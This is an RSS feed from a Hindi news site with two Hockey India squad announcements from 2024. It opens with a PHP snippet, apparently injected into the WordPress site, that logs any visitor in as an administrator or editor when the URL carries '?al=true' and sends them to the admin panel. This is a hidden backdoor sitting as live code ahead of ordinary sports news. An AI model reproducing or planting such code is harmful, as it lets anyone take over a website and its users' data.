// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Hockey India – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 20 Oct 2024 18:05:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 हॉकी इंडिया ने भारत बनाम जर्मनी हॉकी सीरीज के लिए 22 सदस्यीय टीम की घोषणा की https://pratyushaashakinayikiran.com/?p=87624 Sun, 20 Oct 2024 18:05:00 +0000 https://pratyushaashakinayikiran.com/?p=87624 नई दिल्ली
हॉकी इंडिया ने रविवार को विश्व चैंपियन जर्मनी के खिलाफ होने वाली आगामी द्विपक्षीय सीरीज के लिए 22 सदस्यीय भारतीय पुरुष हॉकी टीम की घोषणा कर दी हैं। भारत और जर्मनी के बीच ये दोनों मुकाबले 23 और 24 अक्टूबर को मेजर ध्यानचंद नेशनल स्टेडियम में खेले जायेंगे। भारतीय टीम की अगुवाई हरमनप्रीत सिंह करेंगे और उप कप्तान विवेक सागर प्रसाद होंगे। चोटिल मिडफील्डर हार्दिक सिंह इस सीरीज में नहीं खेल पाएंगे। इस द्विपक्षीय सीरीज में राजिंदर सिंह और आदित्य अर्जुन लागेट अंतरराष्ट्रीय क्रिकेट में पदार्पण करेंगे।

टीम के चयन के बारे में मुख्य कोच क्रेग फुल्टन ने कहा, “हम अगले सप्ताह राष्ट्रीय राजधानी में जर्मनी से मुकाबले के लिए बहुत उत्साहित हैं। भारत और जर्मनी के बीच हाल के वर्षों में कड़ी प्रतिद्वंद्विता रही है और हम नई दिल्ली में खेलने को लेकर उत्साहित हैं। हमने जो टीम चुनी है, वह अनुभवी है, जिसमें कांस्य पदक जीतने वाली पेरिस ओलंपिक टीम के कई खिलाड़ी शामिल हैं। इस सीरीज के दौरान राजिंदर और आदित्य भी अपना अंतरराष्ट्रीय पदार्पण करेंगे, उन्होंने प्रशिक्षण शिविर के दौरान बहुत अच्छा प्रदर्शन किया है।” भारतीय टीम आज दोपहर बेंगलुरु से नई दिल्ली पहुंचेगी।

जर्मनी के साथ होने वाली द्विपक्षीय सीरीज के लिए भारतीय टीम इस प्रकार:-

गोलकीपर:- कृष्ण बहादुर पाठक, सूरज करकेरा

डिफेंडर:- जरमनप्रीत सिंह, अमित रोहिदास, हरमनप्रीत सिंह (कप्तान), वरुण कुमार, संजय, सुमित और नीलम संजीव जेस

मिडफील्डर:- मनप्रीत सिंह, विवेक सागर प्रसाद (उपकप्तान), विष्णु कांत सिंह, नीलकांत शर्मा, शमशेर सिंह, मो. राहील मौसीन, राजिंदर सिंह

फॉरवर्ड्स:- मनदीप सिंह, अभिषेक, सुखजीत सिंह, आदित्य अर्जुन लालागे और दिलप्रीत सिंह और शिलानंद लाकड़ा।

 

]]>
हॉकी इंडिया ने ओलंपिक पूर्व शिविर के लिए 27 खिलाड़ियों का चयन किया https://pratyushaashakinayikiran.com/?p=43417 Thu, 20 Jun 2024 14:40:00 +0000 https://pratyushaashakinayikiran.com/?p=43417 बेंगलुरु
हॉकी इंडिया ने 21 जून से 8 जुलाई तक यहां भारतीय खेल प्राधिकारण (साइ) परिसर में लगाए जाने वाले ओलंपिक पूर्व राष्ट्रीय शिविर के लिए गुरुवार को 27 सदस्यीय पुरुष टीम की घोषणा की। भारत को ओलंपिक में पूल बी में रखा गया है जहां उसका सामना बेल्जियम, अर्जेंटीना, न्यूजीलैंड, ऑस्ट्रेलिया और आयरलैंड से होगा। तोक्यो ओलंपिक की कांस्य पदक विजेता भारतीय टीम ओलंपिक में अपने अभियान की शुरुआत 27 जुलाई को न्यूजीलैंड के खिलाफ करेगी।

भारतीय टीम एफआईएच हॉकी प्रो लीग में अच्छा प्रदर्शन करने के बाद शिविर में वापसी करेगी। प्रो लीग में भारत 16 मैच में 24 अंक के साथ अभी चौथे स्थान पर है। स्ट्राइकर दिलप्रीत सिंह को शिविर के लिए चुनी गई टीम में जगह नहीं मिली है। भारतीय पुरुष हॉकी टीम के मुख्य कोच क्रेग फुल्टन का मानना है कि दुनिया की शीर्ष टीमों के खिलाफ प्रो लीग मैच खेलना उनकी टीम के लिए शानदार अनुभव रहा है।

उन्होंने कहा,‘‘यह शिविर हमारे लिए बेहद महत्वपूर्ण है और हमें यह सुनिश्चित करने की जरूरत है कि हम पेरिस ओलंपिक से पहले अपनी सर्वश्रेष्ठ फॉर्म में रहे। खिलाड़ियों को हॉकी प्रो लीग में खेलने से काफी कुछ सीखने को मिला।’’

फुल्टन ने कहा,‘‘इससे हमें यह पता करने का मौका मिला कि हमें किन क्षेत्रों में सुधार करने की जरूरत है। इन क्षेत्रों में सुधार करने के लिए हमारे पास अभी काफी समय है। हमारे पास बहुत अच्छे खिलाड़ी हैं जो किसी भी प्रतियोगिता को जीतने की योग्यता रखते हैं।’’

ओलंपिक पूर्व शिविर के लिए चुनी गई भारतीय पुरुष हॉकी टीम इस प्रकार है:

गोलकीपर: कृष्ण बहादुर पाठक, पीआर श्रीजेश, सूरज करकेरा

डिफेंडर: हरमनप्रीत सिंह, जरमनप्रीत सिंह, अमित रोहिदास, जुगराज सिंह, संजय, आमिर अली

मिडफील्डर: मनप्रीत सिंह, हार्दिक सिंह, विवेक सागर प्रसाद, सुमित, शमशेर सिंह, नीलकांत शर्मा, राजकुमार पाल, विष्णुकांत सिंह, आकाशदीप सिंह, मोहम्मद राहील मौसीन

फॉरवर्ड: मनदीप सिंह, ललित कुमार उपाध्याय, अभिषेक, दिलप्रीत सिंह, सुखजीत सिंह, गुरजंत सिंह, बॉबी सिंह धामी, अराइजीत सिंह हुंदल।

 

]]>